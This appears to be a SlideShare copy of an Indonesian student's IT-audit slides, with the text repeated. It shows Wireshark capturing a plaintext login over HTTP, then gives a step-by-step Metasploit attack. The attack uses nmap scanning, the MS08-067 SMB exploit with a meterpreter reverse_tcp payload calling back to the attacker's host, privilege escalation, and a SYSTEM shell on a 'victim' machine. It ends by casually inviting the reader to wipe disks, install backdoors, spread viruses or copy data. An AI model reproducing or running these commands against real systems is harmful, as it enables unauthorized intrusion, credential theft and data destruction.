SlideShare ist ein Scribd-Unternehmen logo
1 von 11
Downloaden Sie, um offline zu lesen
1

Dompak King Simbolon_1111500109 | IT AUDIT_STMIK ATMALUHUR PANGKALPINANG
WIRESHARK
1. Melacak password pada jaringan menggunakan Wireshark
Sebelum kita menggunakan tools tesebut ada baiknya kita terlebih dahulu mengetahui
kegunaan dari tools yang akan kita gunakan.
Wireshark itu apa ya??? Newbe ckckckkck
Wireshark merupakan salah satu dari sekian banyak tool Network Analyzer yang banyak
digunakan oleh Network administrator untuk menganalisa kinerja jaringannya terrmasuk
protokol didalamnya. Wireshark banyak disukai karena interfacenya yang menggunakan
Graphical User Interface (GUI) atau tampilan grafis.
Wireshark mampu menangkap paket-paket data atau informasi yang berterbangan dalam
jaringan. Semua jenis paket informasi dalam berbagai format protokol pun akan dengan
mudah ditangkap dan dianalisa. Karenanya tak jarang tool ini juga dapat dipakai untuk
Sniffing (memperoleh informasi penting seperti password email atau account lain) dengan
menangkap paket-paket yang berterbangan di dalam jaringan dan menganalisanya.

Setelah kita mengetahui fungsi dari software yang akan kita gunakan, kali ini kita
akan mencoba salah satu dari fungsi Wireshark yaitu Sniffing.
Bagaimana caranya.....???? yuk ikuti langkah berikut ini..
a. Pertama-tama kita harus menginstal terlebih dahulu program Wireshark pada
computer/Laptop yang akan kita gunakan, untuk Software Wireshark –nya dapat di
download di sini http://www.wireshark.org/
b. Setelah di download, langsung saja instal program Wireshark-nya. Gak susah kok
nginstallnya tinggal next-next aja.....
c. Jika proses penginstalan berhasil dengan mulus kurang lebih tampilan programnya seperti

2

Gambar 1 : Loading configuration files wireshark

Dompak King Simbolon_1111500109 | IT AUDIT_STMIK ATMALUHUR PANGKALPINANG
Gambar 2 : Tampilan awal Wireshark
d. Selanjutnya, seperti rencana awal kita tadi, kita akan melakukan Sniffing pada

suatu jaringan wireless, so ikuti langkah selanjunya.
e. Pilih Interface List seerti gambar dibawah ini

3

Gambar 3 : Interface List
Dompak King Simbolon_1111500109 | IT AUDIT_STMIK ATMALUHUR PANGKALPINANG
f. Setelah kita memilih Interface List, maka akan tampil seperti gambar berikut :

Gambar 4 : Wireshark Capture interface
pada gambar diatas merupakan pilihan koneksi jaringan yang akan kita gunakan, pada
tutorial ini saya memilih jaringan Wireless seperti gambar diatas,
g. Setelah kita jalankan maka secara otomatis Wireshark akan mendeteksi paket-paket
data dan seluruh aktivitas yang berlangsung pada koneksi wireless yang telah kita
pilih seperti gambar berikut :

Gambar 5 : Capturing from Wireshark Network Connection
Ketikkan “http” seperti gambar diatas tanpa tanda petik, lalu tekan tobol enter.
Tunggu beberapa saat, sampai proses scan wireshark hanya menampilakan akses
HTTP yang sedang berlangsung. Bingung???? Hahhahah biar sama-sama ngerti mari
kita langsung jalankan skenarionya...!
Begini, pertama-tama saya akan membuka dan login pada halaman berikut ini :
http://mahasiswa.atmaluhur.ac.id/index.php

4

Dompak King Simbolon_1111500109 | IT AUDIT_STMIK ATMALUHUR PANGKALPINANG
Gambar 6 : Halaman Login Mahasiswa STMIK Atmaluhur
Secara otomatis halaman yang saya buka pasti akan tercantum pada list histori akses
seperti yang tertunjuk pada tanda panah merah dibawah ini :

Gambar 7 : Capturing from Wireshark Network Connection
5

Artinya, ketika kita membuka alamat http://mahasiswa.atmaluhur.ac.id/index.php
maka alamat tersebut, akan terekam sebagai log aktivitas yang berlangsung pada
jaringan tersebut,

Dompak King Simbolon_1111500109 | IT AUDIT_STMIK ATMALUHUR PANGKALPINANG
h. Selanjutnya klik kanan pada pilihan yang tertunujuk pada panah merah seperti gambar

diatas, kemudian pilih Follow TCP Stream. Maka akan tampil seperti gambar berikut :

i.

Gambar 8 : Follow TCP Stream
Perhatikan kotak hijau yang terdapat pada gambar diatas merupakan NIM serta
PASSWORD login saya pada halaman website mahasiswa.atmaluhur.ac.id

6

Dompak King Simbolon_1111500109 | IT AUDIT_STMIK ATMALUHUR PANGKALPINANG
Metasploit
2. Exploit Windows With Metasploit – Backtrack
Setelah kita menggunakan Wireshark, kali ini kita akan mencoba tools selanjutnya yaitu
Metasploit.
Apa itu Metasploit???
Metasploit framework adalah sebuah penetration tool yang cukup powerfull untuk
melakukan penestrasi kedalam sebuah system. metasploit framework bisa juga di katakan
sebagai sebuah platform pengembangan untuk membuat tool security dan exploit.
Metasploit framework sering dibuat dengan menggunakan bahasa pemrograman Ruby.
Fungsi dasar dari metasploit framework adalah untuk memunculkan modul, membiarkan
penggunanya mengkonfigurasikan modul exploit dan mencobanya pada target yang
dituju. Metasploit biasa dikaitkan dengan istilah remote exploitation, maksudnya
walaupun penyusup sistem berada padajarakjangkauan yang jauh tetapi dapat
mengendalikan komputer korban.
Oke langsung saja ke sekenario yang akan kita laksanakan adalah kita akan mencoba
untuk penetrasi ke dalam computer target yang telah kita tentukan dengan menggunakan
Metasploit. Langsung saja ikuti langkah berikut ini :
a. Saya asumsikan bahwa dikomputer atau laptop yang anda gunakan saat ini telah
terinstal software Backtrack, selanjutnya lakukan scan IP dan Port yang terbuka pada
jaringan menggunakan nmap yang telah tersedia di backtrack.
buka terminal ketik perintah nmap -sn 192.168.0.1-255
-sn adalah perintah nmap untuk melakukan scanning IP yang aktif / tidak..
-192.168.0.1-255 adalah IP yang akan kita scan, dari 192.168.0.1 sampai
192.168.0.255
Note : Untuk IP nya dapat disesuaikan dengan IP yang anda gunakan
b. Lalu jika sudah menemukan IP yang aktif kita scan Port yang terbuka pada
target..contoh saya mendapakan IP 192.168.0.4 lakukan perintah nmap -f 192.168.0.4
Note :
-f adalah fast scanning sehingga nmap akan melakukan scanning secepat mungkin…
lihat hasilnya

7

Dompak King Simbolon_1111500109 | IT AUDIT_STMIK ATMALUHUR PANGKALPINANG
Jelas terlihat port 445 terbuka , langsung saja buka msfconsole atau Metasploit Framework
versi console..
c. ketik perintah msfconsole pada terminal/console.
tunggu biasanya agak lama.
setelah terbuka ketik search netapi dan setelah itu kita gunakan yang
exploit/windows/smb/ms08_067_netapi
ketik perintah use exploit/windows/smb/ms08_067_netapi
ketik show options untuk melihat opsi apa yang harus kita isi.

8

d. Langkah selanjutnya kita harus mensetting RHOST terlebih dahulu dengan cara
ketik RHOST dengan ip target lakukan perintah set RHOST 192.168.0.4
Note : IP address menyesuaikan dengan IP Target kita

Dompak King Simbolon_1111500109 | IT AUDIT_STMIK ATMALUHUR PANGKALPINANG
set LHOST 192.168.0.3 ( 192.168.0.3 adalah ip saya )
set LPORT 4444 ( port pada Backtrack )
set PAYLOAD windows/meterpreter/reverse_tcp
jalankan exploit dengan perintah exploit
tampak hasilnya seperti berikut ini :

Sejauh ini kita sudah bias masuk di bagian Meterpreter. Yeee Horeeee 
Sekarang kita akan mengendalikan Command Prompt ( CMD ) korban , tapi sebelumnya kita
lihat dulu posisi kita...
e. pertama kita lihat siapa kita, dengan perintah getuid, dan outputnya NT
AUTHORITYSYSTEM , tapi bagaimana jika bukan NT AUTHORITYSYSTEM alias si
korban tidak menjalankan sebagai administrator pada komputernya? kita lakukan ketik
perintah getsystem , lalu cek lagi dengan perintah getuid jika sudah NT
AUTHORITYSYSTEM lanjutkan...
kita ketik perintah pwd untuk cek keberadaan kita dan pada output saya
adalah C:WINDOWSsystem32 langsung ketik perintah shell untuk eksekusi CMD..dan
hasilnya tampak seperti gambar berikut :

9

Dompak King Simbolon_1111500109 | IT AUDIT_STMIK ATMALUHUR PANGKALPINANG
tapi bagaimana jika ternyata error? tidak seperti di atas saat,error memasukan perintah shell...atau saat
memasukan perintah shell tidak ke C:Windowssystem32 ???
mungkin procces dirrectory nya tidak tepat...
jika masalah seperti itu lakukan perintah migrate...kita akan berpindah..
ketik perintah ps pada meterpreter untuk melihat process ID yang ada...
setelah keluar kita cari PID svchost.exe, jika sudah ketemu pindahlah dengan perintah migrate
contoh : migrate 1328
jika sukses, cek dengan perintah pwd , lalu jalankan perintah shell..
Seperti gambar berikut :

10

Dompak King Simbolon_1111500109 | IT AUDIT_STMIK ATMALUHUR PANGKALPINANG
jika sudah berada di C:Windowssystem32> berarti kita sudah sukses menyusup ke computer Target
yang kita tentukan tinggal selanjutnya bagaimana yang ingin kita lakukan terhadap computer korban,
mau Format Harddisk korban,shutdown,pasang backdoor,sebarin virus,copy data apalah terserah mau
Remmote Desktop. Yah kita yang kendalikan. Tergantung Hati Nurani masing-masing. Hehheheh 

11

Dompak King Simbolon_1111500109 | IT AUDIT_STMIK ATMALUHUR PANGKALPINANG

Weitere ähnliche Inhalte

Ähnlich wie It audit tools

Tutorial cisco packet tracer lengkap
Tutorial cisco packet tracer lengkapTutorial cisco packet tracer lengkap
Tutorial cisco packet tracer lengkaplaila wulandari
 
Tutorial jaringan cisco packet tracer 5.3
Tutorial jaringan cisco packet tracer 5.3Tutorial jaringan cisco packet tracer 5.3
Tutorial jaringan cisco packet tracer 5.3sams4droid
 
Mikrotik tutorial dude
Mikrotik tutorial dudeMikrotik tutorial dude
Mikrotik tutorial dudeDenny Hotspot
 
2013 5. wireshark dengan linux backtrack (5)
2013 5. wireshark dengan linux backtrack (5)2013 5. wireshark dengan linux backtrack (5)
2013 5. wireshark dengan linux backtrack (5)Syiroy Uddin
 
software_monitoring_jaringan.pptx
software_monitoring_jaringan.pptxsoftware_monitoring_jaringan.pptx
software_monitoring_jaringan.pptxsahrulrohim1
 
Tutorial_Cisco_Packet_Tracer_Lengkap.pdf
Tutorial_Cisco_Packet_Tracer_Lengkap.pdfTutorial_Cisco_Packet_Tracer_Lengkap.pdf
Tutorial_Cisco_Packet_Tracer_Lengkap.pdfabdmks15
 
KONFIGURASI MIKROTIK
KONFIGURASI MIKROTIKKONFIGURASI MIKROTIK
KONFIGURASI MIKROTIKTodSavior
 
Modul network troubleshooting
Modul network troubleshootingModul network troubleshooting
Modul network troubleshootingsuparma
 
Belajar hacking-website-d
Belajar hacking-website-dBelajar hacking-website-d
Belajar hacking-website-dAde Tamin
 
Soal administrasi sistem jaringan
Soal administrasi sistem jaringanSoal administrasi sistem jaringan
Soal administrasi sistem jaringanaderezaaprianto
 
tutorial snort and nessus
tutorial snort and nessustutorial snort and nessus
tutorial snort and nessusIT-Networking
 
Modul packet-tracer
Modul packet-tracerModul packet-tracer
Modul packet-tracerAyas Tincem
 
Bab i dasar dasar jaringan
Bab i  dasar dasar jaringanBab i  dasar dasar jaringan
Bab i dasar dasar jaringanCandra Adi Putra
 
Belajar hacking website
Belajar hacking websiteBelajar hacking website
Belajar hacking websiteKamar Tidur
 
2014-34. Proxy Server
2014-34. Proxy Server2014-34. Proxy Server
2014-34. Proxy ServerSyiroy Uddin
 
Laporan resmi
Laporan resmiLaporan resmi
Laporan resminatubakha
 

Ähnlich wie It audit tools (20)

Sniffing itu apa
Sniffing itu apaSniffing itu apa
Sniffing itu apa
 
Tutorial cisco packet tracer lengkap
Tutorial cisco packet tracer lengkapTutorial cisco packet tracer lengkap
Tutorial cisco packet tracer lengkap
 
Tutorial jaringan cisco packet tracer 5.3
Tutorial jaringan cisco packet tracer 5.3Tutorial jaringan cisco packet tracer 5.3
Tutorial jaringan cisco packet tracer 5.3
 
Mikrotik tutorial dude
Mikrotik tutorial dudeMikrotik tutorial dude
Mikrotik tutorial dude
 
2013 5. wireshark dengan linux backtrack (5)
2013 5. wireshark dengan linux backtrack (5)2013 5. wireshark dengan linux backtrack (5)
2013 5. wireshark dengan linux backtrack (5)
 
software_monitoring_jaringan.pptx
software_monitoring_jaringan.pptxsoftware_monitoring_jaringan.pptx
software_monitoring_jaringan.pptx
 
Tutorial_Cisco_Packet_Tracer_Lengkap.pdf
Tutorial_Cisco_Packet_Tracer_Lengkap.pdfTutorial_Cisco_Packet_Tracer_Lengkap.pdf
Tutorial_Cisco_Packet_Tracer_Lengkap.pdf
 
KONFIGURASI MIKROTIK
KONFIGURASI MIKROTIKKONFIGURASI MIKROTIK
KONFIGURASI MIKROTIK
 
Modul network troubleshooting
Modul network troubleshootingModul network troubleshooting
Modul network troubleshooting
 
Belajar hacking-website-d
Belajar hacking-website-dBelajar hacking-website-d
Belajar hacking-website-d
 
Tugas ksi2
Tugas ksi2Tugas ksi2
Tugas ksi2
 
Soal administrasi sistem jaringan
Soal administrasi sistem jaringanSoal administrasi sistem jaringan
Soal administrasi sistem jaringan
 
tutorial snort and nessus
tutorial snort and nessustutorial snort and nessus
tutorial snort and nessus
 
Modul packet-tracer
Modul packet-tracerModul packet-tracer
Modul packet-tracer
 
Modul packet-tracer
Modul packet-tracerModul packet-tracer
Modul packet-tracer
 
Bab i dasar dasar jaringan
Bab i  dasar dasar jaringanBab i  dasar dasar jaringan
Bab i dasar dasar jaringan
 
Belajar hacking website
Belajar hacking websiteBelajar hacking website
Belajar hacking website
 
2014-34. Proxy Server
2014-34. Proxy Server2014-34. Proxy Server
2014-34. Proxy Server
 
Tupen 8 1235010002
Tupen 8   1235010002Tupen 8   1235010002
Tupen 8 1235010002
 
Laporan resmi
Laporan resmiLaporan resmi
Laporan resmi
 

It audit tools

  • 1. 1 Dompak King Simbolon_1111500109 | IT AUDIT_STMIK ATMALUHUR PANGKALPINANG
  • 2. WIRESHARK 1. Melacak password pada jaringan menggunakan Wireshark Sebelum kita menggunakan tools tesebut ada baiknya kita terlebih dahulu mengetahui kegunaan dari tools yang akan kita gunakan. Wireshark itu apa ya??? Newbe ckckckkck Wireshark merupakan salah satu dari sekian banyak tool Network Analyzer yang banyak digunakan oleh Network administrator untuk menganalisa kinerja jaringannya terrmasuk protokol didalamnya. Wireshark banyak disukai karena interfacenya yang menggunakan Graphical User Interface (GUI) atau tampilan grafis. Wireshark mampu menangkap paket-paket data atau informasi yang berterbangan dalam jaringan. Semua jenis paket informasi dalam berbagai format protokol pun akan dengan mudah ditangkap dan dianalisa. Karenanya tak jarang tool ini juga dapat dipakai untuk Sniffing (memperoleh informasi penting seperti password email atau account lain) dengan menangkap paket-paket yang berterbangan di dalam jaringan dan menganalisanya. Setelah kita mengetahui fungsi dari software yang akan kita gunakan, kali ini kita akan mencoba salah satu dari fungsi Wireshark yaitu Sniffing. Bagaimana caranya.....???? yuk ikuti langkah berikut ini.. a. Pertama-tama kita harus menginstal terlebih dahulu program Wireshark pada computer/Laptop yang akan kita gunakan, untuk Software Wireshark –nya dapat di download di sini http://www.wireshark.org/ b. Setelah di download, langsung saja instal program Wireshark-nya. Gak susah kok nginstallnya tinggal next-next aja..... c. Jika proses penginstalan berhasil dengan mulus kurang lebih tampilan programnya seperti 2 Gambar 1 : Loading configuration files wireshark Dompak King Simbolon_1111500109 | IT AUDIT_STMIK ATMALUHUR PANGKALPINANG
  • 3. Gambar 2 : Tampilan awal Wireshark d. Selanjutnya, seperti rencana awal kita tadi, kita akan melakukan Sniffing pada suatu jaringan wireless, so ikuti langkah selanjunya. e. Pilih Interface List seerti gambar dibawah ini 3 Gambar 3 : Interface List Dompak King Simbolon_1111500109 | IT AUDIT_STMIK ATMALUHUR PANGKALPINANG
  • 4. f. Setelah kita memilih Interface List, maka akan tampil seperti gambar berikut : Gambar 4 : Wireshark Capture interface pada gambar diatas merupakan pilihan koneksi jaringan yang akan kita gunakan, pada tutorial ini saya memilih jaringan Wireless seperti gambar diatas, g. Setelah kita jalankan maka secara otomatis Wireshark akan mendeteksi paket-paket data dan seluruh aktivitas yang berlangsung pada koneksi wireless yang telah kita pilih seperti gambar berikut : Gambar 5 : Capturing from Wireshark Network Connection Ketikkan “http” seperti gambar diatas tanpa tanda petik, lalu tekan tobol enter. Tunggu beberapa saat, sampai proses scan wireshark hanya menampilakan akses HTTP yang sedang berlangsung. Bingung???? Hahhahah biar sama-sama ngerti mari kita langsung jalankan skenarionya...! Begini, pertama-tama saya akan membuka dan login pada halaman berikut ini : http://mahasiswa.atmaluhur.ac.id/index.php 4 Dompak King Simbolon_1111500109 | IT AUDIT_STMIK ATMALUHUR PANGKALPINANG
  • 5. Gambar 6 : Halaman Login Mahasiswa STMIK Atmaluhur Secara otomatis halaman yang saya buka pasti akan tercantum pada list histori akses seperti yang tertunjuk pada tanda panah merah dibawah ini : Gambar 7 : Capturing from Wireshark Network Connection 5 Artinya, ketika kita membuka alamat http://mahasiswa.atmaluhur.ac.id/index.php maka alamat tersebut, akan terekam sebagai log aktivitas yang berlangsung pada jaringan tersebut, Dompak King Simbolon_1111500109 | IT AUDIT_STMIK ATMALUHUR PANGKALPINANG
  • 6. h. Selanjutnya klik kanan pada pilihan yang tertunujuk pada panah merah seperti gambar diatas, kemudian pilih Follow TCP Stream. Maka akan tampil seperti gambar berikut : i. Gambar 8 : Follow TCP Stream Perhatikan kotak hijau yang terdapat pada gambar diatas merupakan NIM serta PASSWORD login saya pada halaman website mahasiswa.atmaluhur.ac.id 6 Dompak King Simbolon_1111500109 | IT AUDIT_STMIK ATMALUHUR PANGKALPINANG
  • 7. Metasploit 2. Exploit Windows With Metasploit – Backtrack Setelah kita menggunakan Wireshark, kali ini kita akan mencoba tools selanjutnya yaitu Metasploit. Apa itu Metasploit??? Metasploit framework adalah sebuah penetration tool yang cukup powerfull untuk melakukan penestrasi kedalam sebuah system. metasploit framework bisa juga di katakan sebagai sebuah platform pengembangan untuk membuat tool security dan exploit. Metasploit framework sering dibuat dengan menggunakan bahasa pemrograman Ruby. Fungsi dasar dari metasploit framework adalah untuk memunculkan modul, membiarkan penggunanya mengkonfigurasikan modul exploit dan mencobanya pada target yang dituju. Metasploit biasa dikaitkan dengan istilah remote exploitation, maksudnya walaupun penyusup sistem berada padajarakjangkauan yang jauh tetapi dapat mengendalikan komputer korban. Oke langsung saja ke sekenario yang akan kita laksanakan adalah kita akan mencoba untuk penetrasi ke dalam computer target yang telah kita tentukan dengan menggunakan Metasploit. Langsung saja ikuti langkah berikut ini : a. Saya asumsikan bahwa dikomputer atau laptop yang anda gunakan saat ini telah terinstal software Backtrack, selanjutnya lakukan scan IP dan Port yang terbuka pada jaringan menggunakan nmap yang telah tersedia di backtrack. buka terminal ketik perintah nmap -sn 192.168.0.1-255 -sn adalah perintah nmap untuk melakukan scanning IP yang aktif / tidak.. -192.168.0.1-255 adalah IP yang akan kita scan, dari 192.168.0.1 sampai 192.168.0.255 Note : Untuk IP nya dapat disesuaikan dengan IP yang anda gunakan b. Lalu jika sudah menemukan IP yang aktif kita scan Port yang terbuka pada target..contoh saya mendapakan IP 192.168.0.4 lakukan perintah nmap -f 192.168.0.4 Note : -f adalah fast scanning sehingga nmap akan melakukan scanning secepat mungkin… lihat hasilnya 7 Dompak King Simbolon_1111500109 | IT AUDIT_STMIK ATMALUHUR PANGKALPINANG
  • 8. Jelas terlihat port 445 terbuka , langsung saja buka msfconsole atau Metasploit Framework versi console.. c. ketik perintah msfconsole pada terminal/console. tunggu biasanya agak lama. setelah terbuka ketik search netapi dan setelah itu kita gunakan yang exploit/windows/smb/ms08_067_netapi ketik perintah use exploit/windows/smb/ms08_067_netapi ketik show options untuk melihat opsi apa yang harus kita isi. 8 d. Langkah selanjutnya kita harus mensetting RHOST terlebih dahulu dengan cara ketik RHOST dengan ip target lakukan perintah set RHOST 192.168.0.4 Note : IP address menyesuaikan dengan IP Target kita Dompak King Simbolon_1111500109 | IT AUDIT_STMIK ATMALUHUR PANGKALPINANG
  • 9. set LHOST 192.168.0.3 ( 192.168.0.3 adalah ip saya ) set LPORT 4444 ( port pada Backtrack ) set PAYLOAD windows/meterpreter/reverse_tcp jalankan exploit dengan perintah exploit tampak hasilnya seperti berikut ini : Sejauh ini kita sudah bias masuk di bagian Meterpreter. Yeee Horeeee  Sekarang kita akan mengendalikan Command Prompt ( CMD ) korban , tapi sebelumnya kita lihat dulu posisi kita... e. pertama kita lihat siapa kita, dengan perintah getuid, dan outputnya NT AUTHORITYSYSTEM , tapi bagaimana jika bukan NT AUTHORITYSYSTEM alias si korban tidak menjalankan sebagai administrator pada komputernya? kita lakukan ketik perintah getsystem , lalu cek lagi dengan perintah getuid jika sudah NT AUTHORITYSYSTEM lanjutkan... kita ketik perintah pwd untuk cek keberadaan kita dan pada output saya adalah C:WINDOWSsystem32 langsung ketik perintah shell untuk eksekusi CMD..dan hasilnya tampak seperti gambar berikut : 9 Dompak King Simbolon_1111500109 | IT AUDIT_STMIK ATMALUHUR PANGKALPINANG
  • 10. tapi bagaimana jika ternyata error? tidak seperti di atas saat,error memasukan perintah shell...atau saat memasukan perintah shell tidak ke C:Windowssystem32 ??? mungkin procces dirrectory nya tidak tepat... jika masalah seperti itu lakukan perintah migrate...kita akan berpindah.. ketik perintah ps pada meterpreter untuk melihat process ID yang ada... setelah keluar kita cari PID svchost.exe, jika sudah ketemu pindahlah dengan perintah migrate contoh : migrate 1328 jika sukses, cek dengan perintah pwd , lalu jalankan perintah shell.. Seperti gambar berikut : 10 Dompak King Simbolon_1111500109 | IT AUDIT_STMIK ATMALUHUR PANGKALPINANG
  • 11. jika sudah berada di C:Windowssystem32> berarti kita sudah sukses menyusup ke computer Target yang kita tentukan tinggal selanjutnya bagaimana yang ingin kita lakukan terhadap computer korban, mau Format Harddisk korban,shutdown,pasang backdoor,sebarin virus,copy data apalah terserah mau Remmote Desktop. Yah kita yang kendalikan. Tergantung Hati Nurani masing-masing. Hehheheh  11 Dompak King Simbolon_1111500109 | IT AUDIT_STMIK ATMALUHUR PANGKALPINANG